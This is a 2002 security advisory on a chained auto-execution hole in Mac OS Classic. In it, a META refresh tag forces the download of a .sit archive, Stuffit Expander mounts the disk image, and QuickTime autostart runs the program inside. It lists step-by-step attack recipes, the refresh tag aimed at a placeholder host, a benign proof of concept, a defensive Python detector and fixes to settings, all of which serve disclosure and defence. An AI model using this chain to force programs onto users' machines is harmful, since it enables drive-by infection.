MacOS/MacOSX Classic Environment Arbitrary File Executions



28th Feb 2002

COMMAND

	Arbitrary file executions

SYSTEMS AFFECTED
		
	Mac OS and Mac OS X with Classic Environment
	

	 Details :
	 =======

	 MacOS 9.x, and Mac OS X with Classic environment*1
	 (probably System 7.5.x or higher)
	 QuickTime 2.0 or higher version (probably)*2
	 Stuffit Expander 5.x or higher version for Mac OS
	 Stuffit Expander 6.5 or higher version for Mac OS X*3
	 All browsers and network clients using Stuffit Expander in
	 post-process for download*4

	  *1: Mac OS X used by itself (without Classic) is not affected.
	  *2: "Autostart CD-ROMs" has been supported since QuickTime 2.0.
	  *3: Stuffit Expander 6.0 for X is not affected.
	  *4: Netscape 6.x and Mozilla show a dialog before download.
	  *4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.
	  *4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP
	      Client 3.0.1. These are vulnerable.

PROBLEM

	vm_converter <vm_converter@mac.com> and FUJII Taiyo <taiyo@vinet.or.jp>,
	in their advisory
	[http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html] :
	

	If a victim merely browses a malicious web page :

	1. The browser automatically starts downloading a compressed
	   disk-image file which includes a malicious program.

	2. An archiver, such as Stuffit Expander, automatically expands the
	   compressed file and mounts the disk image.

	3. Mac OS (QuickTime) executes the malicious program included in the
	   disk image. This depends on the QuickTime settings.

	These 3 steps happen fully automatically and finish in an instant.

	This vulnerability builds on 3 vulnerabilities and arises from complex
	interactions among several pieces of software. To explain it, we
	summarize these 3 vulnerabilities below.
	

	

	 Vuln.1 (already announced at Bugtraq)

	"Macinosh IE file execuion vulerability" [BugTraq] 2002 Jan.22 from
	Jass Seljamaa. In that post he reports the vulnerable systems as "IE
	5.0, probably earlier, on Classic systems(below OS X)". However, the
	vulnerable systems which we found are :

	 Microsoft Internet Explorer 5.0 through 5.1.3
	 iCab Pre 2.7 and 2.7.1

	This means malicious users can execute local programs on a Macintosh
	through web pages. However, they can only execute programs whose full
	file path on the Macintosh is known to them.
	

	

	 Vuln.2 (probably announced in Japan only)

	The day after Vuln.1 was reported, a Japanese user, Mr. Mori, presented
	another vulnerability related to Vuln.1 at "Security Hole memo"
	(written in Japanese).

	http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie

	This vulnerability, similar to Vuln.1, is observed when a web page
	containing the META tag below is browsed.

	   <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/some.sit">

	

	After these pages are browsed, malicious programs are downloaded
	automatically. So malicious users who combine Vuln.1 and Vuln.2 can
	force victims to download the program and execute it. But to force
	execution of the program, the malicious users must know the full file
	path of the download folder on the victim's Macintosh. Vulnerable
	browsers (in our test) :

	 Microsoft Internet Explorer 4.5 through 5.1.3
	 Netscape Communicator 4.78
	 Netscape 6.2*1
	 Mozilla 0.9.7*1
	 iCab Pre 2.7 and 2.7.1
	 Opera 5.0
	 OmniWeb 4.0.6 and 4.1beta11

	 *1: Netscape 6.2 and Mozilla show a dialog before download.
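
	A defender-side check for the META refresh pattern described under Vuln.2, as an added example that is not part of the original advisory: it scans a page for refresh tags whose target ends in one of the archive types the advisory names (*.sit, *.hqx, *.bin). The function names, the sample HTML and the example.test base URL are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urljoin, urlsplit

# Archive types the advisory lists as automatically expanded after download.
ARCHIVE_EXTS = (".sit", ".hqx", ".bin")
_REFRESH_RE = re.compile(
    r"\s*(\d*\.?\d*)\s*(?:[;,]\s*(?:url\s*=\s*)?(.*))?$", re.I | re.S)

def parse_refresh(content):
    """Split a refresh CONTENT value into (delay_seconds, target or None)."""
    m = _REFRESH_RE.match(content)
    if m is None:
        return None
    try:
        delay = float(m.group(1))
    except ValueError:              # empty or "." delay: treat as immediate
        delay = 0.0
    target = (m.group(2) or "").strip().strip("'\"")
    # Browsers drop tab/CR/LF inside URLs, so a wrapped attribute still works.
    target = re.sub(r"[\t\r\n]", "", target)
    return delay, (target or None)

class RefreshFinder(HTMLParser):
    """Collects META refresh targets whose path ends in an archive extension."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}    # names arrive lower-cased
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        parsed = parse_refresh(a.get("content", ""))
        if parsed is None or parsed[1] is None:
            return
        delay, target = parsed
        url = urljoin(self.base_url, target)    # resolve relative targets
        path = unquote(urlsplit(url).path).lower()
        if path.endswith(ARCHIVE_EXTS):
            self.findings.append((delay, url))

def find_auto_downloads(html, base_url):
    finder = RefreshFinder(base_url)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: two archive refreshes, one ordinary redirect,
# and one META tag that is not a refresh at all.
SAMPLE_BASE = "http://example.test/pages/index.html"
SAMPLE_HTML = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/some.sit">
<meta http-equiv="Refresh" content="0; url='files/tool.img.hqx'">
<meta http-equiv="refresh" content="30;URL=/news.html">
<meta name="description" content="1;URL=http://somewhere.com/other.sit">
</head><body></body></html>"""
```

	Calling find_auto_downloads(SAMPLE_HTML, SAMPLE_BASE) returns only the two archive targets, with relative URLs resolved against the page address.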

	

	

	 Vuln. 3 (we found, probably announced in Japan only)

	Building on Vuln.1 and 2, we found another vulnerability: malicious
	users can launch arbitrary programs without knowing the full file path.

	     Step 1 : Make a disk image that contains a malicious program.
	     Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
	              also effective)
	     Step 3 : Upload this *.sit file to some website and prepare a web
	              page using Vuln.1 and 2
	     Step 4 : Victims browse the web page and the *.sit file is
	              downloaded automatically.*
	     Step 5 : Stuffit Expander automatically extracts the *.sit file and
	              mounts the disk image.
	     Step 6 : The malicious program in the disk image is executed
	              automatically by browsers.*

	     *Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.

	Because a disk image is used, malicious users do not depend on the file
	path of the download folder. They only need to prepare the malicious
	program and web pages. In this vulnerability, Stuffit Expander plays an
	important role: it automatically extracts archives and auto-mounts disk
	images. Then, by way of Vuln.1, the browser executes the program.
	Vulnerable systems (in our test) :

	 Stuffit Expander 5.x through 6.5.1 for Mac OS
	 Stuffit Expander 6.5 or higher version for Mac OS X*1
	 Microsoft Internet Explorer 5.0 through 5.1.3
	 iCab Pre 2.7 and 2.7.1

	 *1: Stuffit Expander 6.0 for X is not affected.

	

	We made a test page for this vulnerability. Please try it.

	http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/

	----------------------------------------------------------------------
	Auto file execution vulnerability in Mac OS
	----------------------------------------------------------------------

	Based on Vuln.1 through Vuln.3, we explain the "Auto file execution
	vulnerability in Mac OS". This vulnerability, which we found, uses
	Vuln.2 and 3 but not Vuln.1. It is caused by complex interactions among
	several pieces of software, such as browsers (and network clients),
	Stuffit Expander and QuickTime. It resembles the computer virus
	"AutoStart9805", which uses "Autostart CD-ROMs" of QuickTime. In this
	way, as with Vuln.3, malicious users can launch arbitrary programs
	without knowing the full file path.
	

	   Step 1 : Make a disk image that contains an "autostart" malicious
	            program.
	   Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
	            also effective)
	   Step 3 : Upload this *.sit file to some website and prepare a web
	            page using Vuln. 2.
	   Steps 4 and 5 are the same as in Vuln. 3.
	   Step 6 : The program in the image is executed automatically by
	            "Autostart CD-ROMs" of QuickTime.

	In this vulnerability,

	   1. the browser downloads the *.sit by way of Vuln.2.
	   2. then, Stuffit Expander automatically extracts it and auto-mounts
	      the disk image.
	   3. and then, QuickTime executes the program in the image.

	These are the initial settings of each program. It is teamwork. A
	single click on a web page is all it needs to start automatic download,
	extraction, mounting, and execution. Furthermore, if victims manually
	download a malicious disk image with a browser or another network
	client (like Fetch via FTP), automatic extraction, mounting and
	execution will start.
	

	 uuEncode Exploit :
	 ================

	From [http://www.u-struct.com/diary/img/20020131_OSissue_E/] :

	When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is
	downloaded and extracted, the disk image "Exploit_HD_OSX" is mounted,
	and the application "openTrash" is launched automatically. "openTrash"
	is an application that prompts "This application opens trash only" and
	only opens the Trash.
	

	


SOLUTION
		
	Change the initial settings of each of the items below.

	In Mac OS : required settings

	   - "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.
	   - Stuffit Expander > preferences > Disk images > "Mount Disk Images"
	     > turn off.
	   - Change the initial Volume name (e.g. Macintosh HD) to another name.
	   - Change the initial "Download Folder" (e.g. Desktop Folder) of
	     browsers to another folder.

	More secure settings (not required)

	   - Stuffit Expander > preferences > Expanding > "Continue to expand"
	     > turn off.
	   - Each browser and network client > its preferences > change the
	     download setting that uses Stuffit Expander in post-process to
	     "save to file"
	   - Each browser > its preferences > change download settings to
	     "disable" *

	    * For example, in Internet Explorer, set the "Security Zones" to
	      "high" or "custom" (File downloads to "Disable").

	In Mac OS X with Classic environment :

	  - Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"
	    > turn off.*
	  - The other settings are the same as in Mac OS.

	   * "Autostart CD-ROMs" is controlled by Classic's "QuickTime
	     setting". So, when the Classic environment is not booted, Mac OS X
	     is not affected.

	

